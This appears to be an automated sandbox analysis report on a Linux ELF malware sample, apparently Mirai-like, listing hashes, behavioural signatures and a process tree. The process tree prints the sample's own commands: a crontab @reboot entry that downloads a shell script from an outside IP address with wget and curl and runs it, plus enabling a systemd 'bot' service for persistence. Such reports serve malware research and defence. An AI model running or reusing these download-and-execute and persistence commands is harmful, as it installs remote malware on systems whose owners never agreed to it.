Analysis
-
max time kernel
141s -
max time network
154s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20231215-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20231215-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
08/01/2024, 03:41
Static task
static1
Behavioral task
behavioral1
Sample
9478bb8fa96a4b9baa199be60285800027abb1fd296ca8e0a0fd26ee647c49ff.elf
Resource
ubuntu1804-amd64-20231215-en
General
-
Target
9478bb8fa96a4b9baa199be60285800027abb1fd296ca8e0a0fd26ee647c49ff.elf
-
Size
64KB
-
MD5
ccdcabc06ed12d315440fabad4c0e7a9
-
SHA1
08603a1dc5aded6cd1d271a4d8d57bccb5c64495
-
SHA256
9478bb8fa96a4b9baa199be60285800027abb1fd296ca8e0a0fd26ee647c49ff
-
SHA512
2ff4c9983ab2addab390bca1dd34fe88c36d51028723d58a3ba742e8cb86a39e175f6dabb04c9960f2db84f17c5fc067eb8afa8119bf3bd6e498f22da6eadda2
-
SSDEEP
1536:a3NvZJP6+ckhKHOBXygfki1An01Y0ff7VuCRerRY:kNhJS+YOBNMi1W0yYjAwKY
Malware Config
Signatures
-
Changes its process name 1 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself /bin/busybox 1525 9478bb8fa96a4b9baa199be60285800027abb1fd296ca8e0a0fd26ee647c49ff.elf -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog 9478bb8fa96a4b9baa199be60285800027abb1fd296ca8e0a0fd26ee647c49ff.elf File opened for modification /dev/misc/watchdog 9478bb8fa96a4b9baa199be60285800027abb1fd296ca8e0a0fd26ee647c49ff.elf -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.uIfVKk crontab -
Creates/modifies environment variables 1 TTPs 1 IoCs
Creating/modifying environment variables is a common persistence mechanism.
description ioc File opened for modification /root/.bashrc -
Enumerates active TCP sockets 1 TTPs 1 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc File opened for reading /proc/net/tcp -
Enumerates running processes
Discovers information about currently running processes on the system
-
Modifies systemd 1 TTPs 1 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
description ioc File opened for modification /lib/systemd/system/bot.service -
Modifies Bash startup script 1 TTPs 1 IoCs
description ioc File opened for modification /root/.bashrc -
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc File opened for reading /proc/net/tcp -
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
description ioc File opened for reading /proc/532/fd File opened for reading /proc/947/stat File opened for reading /proc/1065/stat File opened for reading /proc/170/stat File opened for reading /proc/168/cmdline File opened for reading /proc/265/stat File opened for reading /proc/1141/cmdline File opened for reading /proc/34/cmdline File opened for reading /proc/1519/stat File opened for reading /proc/1520/cmdline File opened for reading /proc/1557/stat File opened for reading /proc/156/stat File opened for reading /proc/78/fd File opened for reading /proc/1255/fd File opened for reading /proc/28/fd File opened for reading /proc/17/fd File opened for reading /proc/24/stat File opened for reading /proc/84/stat File opened for reading /proc/1547/fd File opened for reading /proc/1556/stat File opened for reading /proc/14/stat File opened for reading /proc/1111/cmdline File opened for reading /proc/1088/cmdline File opened for reading /proc/30/fd File opened for reading /proc/154/stat File opened for reading /proc/1136/stat File opened for reading /proc/1190/cmdline File opened for reading /proc/1290/fd File opened for reading /proc/27/stat File opened for reading /proc/82/fd File opened for reading /proc/162/fd File opened for reading /proc/171/stat File opened for reading /proc/1112/stat File opened for reading /proc/2/fd File opened for reading /proc/254/cmdline File opened for reading /proc/638/fd File opened for reading /proc/160/stat File opened for reading /proc/11/fd File opened for reading /proc/83/fd File opened for reading /proc/164/fd File opened for reading /proc/332/cmdline File opened for reading /proc/454/stat File opened for reading /proc/1124/fd File opened for reading /proc/1328/fd File opened for reading /proc/9/cmdline File opened for reading /proc/36/fd File opened for reading /proc/1539/stat File opened for reading /proc/34/stat File opened for reading /proc/662/stat File opened for reading /proc/26/fd File opened for reading /proc/163/stat File opened for reading /proc/711/cmdline File opened for reading /proc/1120/fd File opened for reading /proc/1164/stat File opened for reading /proc/1520/stat File opened for reading /proc/1552/cmdline File opened for reading /proc/10/fd File opened for reading /proc/460/cmdline File opened for reading /proc/952/cmdline File opened for reading /proc/1141/fd File opened for reading /proc/1460/fd File opened for reading /proc/1529/stat File opened for reading /proc/1527/fd File opened for reading /proc/79/cmdline
Processes
-
/tmp/9478bb8fa96a4b9baa199be60285800027abb1fd296ca8e0a0fd26ee647c49ff.elf/tmp/9478bb8fa96a4b9baa199be60285800027abb1fd296ca8e0a0fd26ee647c49ff.elf1⤵
- Changes its process name
- Modifies Watchdog functionality
PID:1525
-
/bin/shsh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://82.165.215.205/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://82.165.215.205/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"1⤵PID:1530
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1532
-
-
/bin/shsh bins.sh2⤵PID:1531
-
-
/usr/bin/crontabcrontab -l1⤵PID:1533
-
/bin/chmodchmod +x bins.sh1⤵PID:1534
-
/bin/shsh bins.sh1⤵PID:1535
-
/bin/curl/bin/curl -k -L --output bins.sh http://82.165.215.205/bins/bins.sh1⤵PID:1536
-
/bin/chmodchmod +x bins.sh1⤵PID:1537
-
/bin/shsh -c "/bin/systemctl enable bot"1⤵PID:1538
-
/bin/systemctl/bin/systemctl enable bot2⤵PID:1539
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
368B
MD5d77308e381db6ea7245af6f3b7be118e
SHA10a0f20a03f4db351a404954c780eebd15b3775bb
SHA256feb6c31fee6eedbf83b5d657838427588bc7426532238a2675b8dbb74c9bf55b
SHA51268c2b02daaaaa8d34e8f0a9264894fd781527b3b855477ac9435145daf5063e46d9abd7684f7c52be4f27850890be5261837dd3ad3f7a5a54d9343e2e6cda0e4
-
Filesize
241B
MD52f16a50a03b078ad9d67f3835641e9fd
SHA18317001974fe8b4806e2377f4e62f9c74d588388
SHA2562d76916fafe2a76c0ec1fe539d813bec0aa03cf12d6a5301490d21dff498698f
SHA51220b097960cce1f804f9be20f7ec9f36c75bfaba2dfaf6bf083433229d38db19896e9b95110eb47e6cafb69c8bc8f916a668115c2187ff00acf8833d607a18c85